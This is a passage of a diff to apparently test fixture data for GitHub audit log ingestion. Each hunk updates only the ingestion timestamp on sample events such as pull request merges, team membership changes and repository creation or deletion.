"{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1614195224710,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2208,7 +2208,7 @@ }, "event": { "action": "workflows.delete_workflow_run", - "ingested": "2021-10-12T20:36:26.041253456Z", + "ingested": "2021-12-14T14:44:07.248202829Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"workflow_id\":5295458,\"head_branch\":\"Barrel-Racing-Path\",\"trigger_id\":6603009132,\"started_at\":\"2021-02-25T23:29:00.000Z\",\"event\":\"push\",\"head_sha\":\"c2b54496f96d8bd518d1b95b3f91e25d7e5a3068\",\"workflow_run_id\":601065160},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1614296047285,\"action\":\"workflows.delete_workflow_run\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2248,7 +2248,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041258355Z", + "ingested": "2021-12-14T14:44:07.248203227Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1614195238102,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2288,7 +2288,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041263405Z", + "ingested": "2021-12-14T14:44:07.248204417Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1614195685549,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2328,7 +2328,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041268765Z", + "ingested": "2021-12-14T14:44:07.248204817Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1617161729305,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2368,7 +2368,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041273784Z", + "ingested": "2021-12-14T14:44:07.248205212Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1617161720150,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2408,7 +2408,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041278693Z", + "ingested": "2021-12-14T14:44:07.248205603Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1617161700105,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2448,7 +2448,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041283482Z", + "ingested": "2021-12-14T14:44:07.248205990Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1619473513093,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2489,7 +2489,7 @@ }, "event": { "action": "repo.add_member", - "ingested": "2021-10-12T20:36:26.041288411Z", + "ingested": "2021-12-14T14:44:07.248206380Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-abc-123\",\"created_at\":1619733030434,\"action\":\"repo.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -2530,7 +2530,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041293481Z", + "ingested": "2021-12-14T14:44:07.248206758Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1619474367775,\"action\":\"pull_request_review.submit\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2570,7 +2570,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041298681Z", + "ingested": "2021-12-14T14:44:07.248207143Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1617579395496,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2608,7 +2608,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041303780Z", + "ingested": "2021-12-14T14:44:07.248207530Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1619474375960,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2648,7 +2648,7 @@ }, "event": { "action": "repo.transfer", - "ingested": "2021-10-12T20:36:26.041308629Z", + "ingested": "2021-12-14T14:44:07.248207924Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"old_user\":\"agrinmanriv0537\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-abc-123\",\"created_at\":1619733030516,\"action\":\"repo.transfer\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2693,7 +2693,7 @@ }, "event": { "action": "workflows.delete_workflow_run", - "ingested": "2021-10-12T20:36:26.041313549Z", + "ingested": "2021-12-14T14:44:07.248208313Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"workflow_id\":5295458,\"head_branch\":\"PIDTurret\",\"trigger_id\":6454857724,\"started_at\":\"2021-04-26T21:31:54.000Z\",\"event\":\"push\",\"head_sha\":\"5e66d4c16db382dd28f660240121248ca015c20f\",\"workflow_run_id\":787035990},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1619472938032,\"action\":\"workflows.delete_workflow_run\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2733,7 +2733,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041320361Z", + "ingested": "2021-12-14T14:44:07.248208748Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1619472990084,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2771,7 +2771,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041326112Z", + "ingested": "2021-12-14T14:44:07.248209140Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1619733497686,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2811,7 +2811,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041331392Z", + "ingested": "2021-12-14T14:44:07.248209526Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1617579430186,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2852,7 +2852,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041336472Z", + "ingested": "2021-12-14T14:44:07.248209926Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-abc-123\",\"created_at\":1619733030216,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2895,7 +2895,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041341291Z", + "ingested": "2021-12-14T14:44:07.248210315Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1617579367679,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2933,7 +2933,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041346751Z", + "ingested": "2021-12-14T14:44:07.248210718Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1619473421968,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2971,7 +2971,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041351730Z", + "ingested": "2021-12-14T14:44:07.248211102Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request.merge\",\"created_at\":1619733612746,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3011,7 +3011,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041356750Z", + "ingested": "2021-12-14T14:44:07.248211486Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1619473078873,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3052,7 +3052,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041362400Z", + "ingested": "2021-12-14T14:44:07.248211886Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-abc-123\",\"created_at\":1619733030283,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3093,7 +3093,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041368041Z", + "ingested": "2021-12-14T14:44:07.248212276Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1619472400915,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3131,7 +3131,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041373311Z", + "ingested": "2021-12-14T14:44:07.248212774Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request.create_review_request\",\"created_at\":1623197286783,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3169,7 +3169,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041378220Z", + "ingested": "2021-12-14T14:44:07.248213185Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623284928961,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3207,7 +3207,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041383059Z", + "ingested": "2021-12-14T14:44:07.248213570Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623197303036,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3245,7 +3245,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041387888Z", + "ingested": "2021-12-14T14:44:07.248213949Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623709113238,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3283,7 +3283,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041392848Z", + "ingested": "2021-12-14T14:44:07.248214356Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623200606165,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3321,7 +3321,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041398218Z", + "ingested": "2021-12-14T14:44:07.248214745Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1622852455604,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3359,7 +3359,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041403417Z", + "ingested": "2021-12-14T14:44:07.248215126Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1622852615112,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3397,7 +3397,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041410521Z", + "ingested": "2021-12-14T14:44:07.248215514Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623709107881,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3435,7 +3435,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041415991Z", + "ingested": "2021-12-14T14:44:07.248215892Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623284935234,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3473,7 +3473,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041421151Z", + "ingested": "2021-12-14T14:44:07.248216275Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623200615714,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3511,7 +3511,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041426170Z", + "ingested": "2021-12-14T14:44:07.248216658Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623366866659,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3549,7 +3549,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041431580Z", + "ingested": "2021-12-14T14:44:07.248217128Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623200629331,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3587,7 +3587,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041436600Z", + "ingested": "2021-12-14T14:44:07.248217521Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request.create_review_request\",\"created_at\":1623197274294,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3625,7 +3625,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041441529Z", + "ingested": "2021-12-14T14:44:07.248217903Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623200651042,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3663,7 +3663,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041447330Z", + "ingested": "2021-12-14T14:44:07.248218304Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623197300963,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3701,7 +3701,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041453301Z", + "ingested": "2021-12-14T14:44:07.248218685Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1622852649552,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3739,7 +3739,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041458320Z", + "ingested": "2021-12-14T14:44:07.248219077Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1622852723876,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3777,7 +3777,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041463771Z", + "ingested": "2021-12-14T14:44:07.248219459Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623284903152,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3815,7 +3815,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041468800Z", + "ingested": "2021-12-14T14:44:07.248219845Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623197138430,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3855,7 +3855,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041473890Z", + "ingested": "2021-12-14T14:44:07.248220246Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1623200513984,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3893,7 +3893,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041478729Z", + "ingested": "2021-12-14T14:44:07.248220623Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623366896448,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3931,7 +3931,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041483678Z", + "ingested": "2021-12-14T14:44:07.248221072Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623371009948,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3969,7 +3969,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041488577Z", + "ingested": "2021-12-14T14:44:07.248221462Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request.merge\",\"created_at\":1623197309607,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4007,7 +4007,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041493607Z", + "ingested": "2021-12-14T14:44:07.248221843Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623371005977,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4047,7 +4047,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041498806Z", + "ingested": "2021-12-14T14:44:07.248222249Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1625314262517,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4087,7 +4087,7 @@ }, "event": { "action": "repo.create", - "ingested": "2021-10-12T20:36:26.041504287Z", + "ingested": "2021-12-14T14:44:07.248222661Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1625283218542,\"action\":\"repo.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4128,7 +4128,7 @@ }, "event": { "action": "repo.add_member", - "ingested": "2021-10-12T20:36:26.041509166Z", + "ingested": "2021-12-14T14:44:07.248223043Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1625283218373,\"action\":\"repo.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4166,7 +4166,7 @@ }, "event": { "action": "repo.update_default_branch", - "ingested": "2021-10-12T20:36:26.041514115Z", + "ingested": "2021-12-14T14:44:07.248223434Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1625283222495,\"action\":\"repo.update_default_branch\"}", "type": [ "access" @@ -4207,7 +4207,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041518834Z", + "ingested": "2021-12-14T14:44:07.248223822Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"created_at\":1629754452056,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4257,7 +4257,7 @@ }, "event": { "action": "team.add_member", - "ingested": "2021-10-12T20:36:26.041523603Z", + "ingested": "2021-12-14T14:44:07.248224210Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"created_at\":1629754543604,\"action\":\"team.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4307,7 +4307,7 @@ }, "event": { "action": "repo.add_member", - "ingested": "2021-10-12T20:36:26.041528412Z", + "ingested": "2021-12-14T14:44:07.248224670Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-2021\",\"created_at\":1629769833205,\"action\":\"repo.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4351,7 +4351,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041533221Z", + "ingested": "2021-12-14T14:44:07.248225050Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"created_at\":1629754473817,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4400,7 +4400,7 @@ }, "event": { "action": "repo.create", - "ingested": "2021-10-12T20:36:26.041537830Z", + "ingested": "2021-12-14T14:44:07.248225441Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-2021\",\"created_at\":1629769833389,\"action\":\"repo.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4441,7 +4441,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041543400Z", + "ingested": "2021-12-14T14:44:07.248225826Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"created_at\":1629754474042,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4491,7 +4491,7 @@ }, "event": { "action": "team.update_repository_permission", - "ingested": "2021-10-12T20:36:26.041548400Z", + "ingested": "2021-12-14T14:44:07.248226249Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1629767631761,\"action\":\"team.update_repository_permission\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4535,7 +4535,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041553609Z", + "ingested": "2021-12-14T14:44:07.248226646Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"created_at\":1629754429430,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4585,7 +4585,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041558579Z", + "ingested": "2021-12-14T14:44:07.248227185Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1629767578993,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4628,7 +4628,7 @@ }, "event": { "action": "repo.destroy", - "ingested": "2021-10-12T20:36:26.041563718Z", + "ingested": "2021-12-14T14:44:07.248227575Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-2021\",\"created_at\":1629769916760,\"action\":\"repo.destroy\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4669,7 +4669,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041568758Z", + "ingested": "2021-12-14T14:44:07.248228261Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"created_at\":1629754452206,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4718,7 +4718,7 @@ }, "event": { "action": "project.create", - "ingested": "2021-10-12T20:36:26.041573737Z", + "ingested": "2021-12-14T14:44:07.248228731Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631894812761,\"action\":\"project.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4753,7 +4753,7 @@ }, "event": { "action": "repo.actions_enabled", - "ingested": "2021-10-12T20:36:26.041578837Z", + "ingested": "2021-12-14T14:44:07.248229137Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146068095,\"action\":\"repo.actions_enabled\"}", "type": [ "access" @@ -4793,7 +4793,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041583525Z", + "ingested": "2021-12-14T14:44:07.248229533Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632145649686,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4833,7 +4833,7 @@ }, "event": { "action": "protected_branch.update_required_status_checks_enforcement_level", - "ingested": "2021-10-12T20:36:26.041588334Z", + "ingested": "2021-12-14T14:44:07.248229930Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632155655619,\"action\":\"protected_branch.update_required_status_checks_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4873,7 +4873,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041593093Z", + "ingested": "2021-12-14T14:44:07.248230347Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631834277596,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4913,7 +4913,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041598073Z", + "ingested": "2021-12-14T14:44:07.248230726Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146504145,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4953,7 +4953,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041603353Z", + "ingested": "2021-12-14T14:44:07.248231116Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632440423281,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4991,7 +4991,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041608162Z", + "ingested": "2021-12-14T14:44:07.248231535Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1631573140006,\"action\":\"pull_request_review.submit\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5031,7 +5031,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041612981Z", + "ingested": "2021-12-14T14:44:07.248231930Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146510168,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5071,7 +5071,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041618391Z", + "ingested": "2021-12-14T14:44:07.248232308Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631896079162,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5111,7 +5111,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041623140Z", + "ingested": "2021-12-14T14:44:07.248232692Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631834480813,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5152,7 +5152,7 @@ }, "event": { "action": "team.add_member", - "ingested": "2021-10-12T20:36:26.041627959Z", + "ingested": "2021-12-14T14:44:07.248233087Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/contributors\"},\"org\":\"Example-Org\",\"created_at\":1631999351294,\"action\":\"team.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -5201,7 +5201,7 @@ }, "event": { "action": "required_status_check.create", - "ingested": "2021-10-12T20:36:26.041633289Z", + "ingested": "2021-12-14T14:44:07.248233524Z", "original": 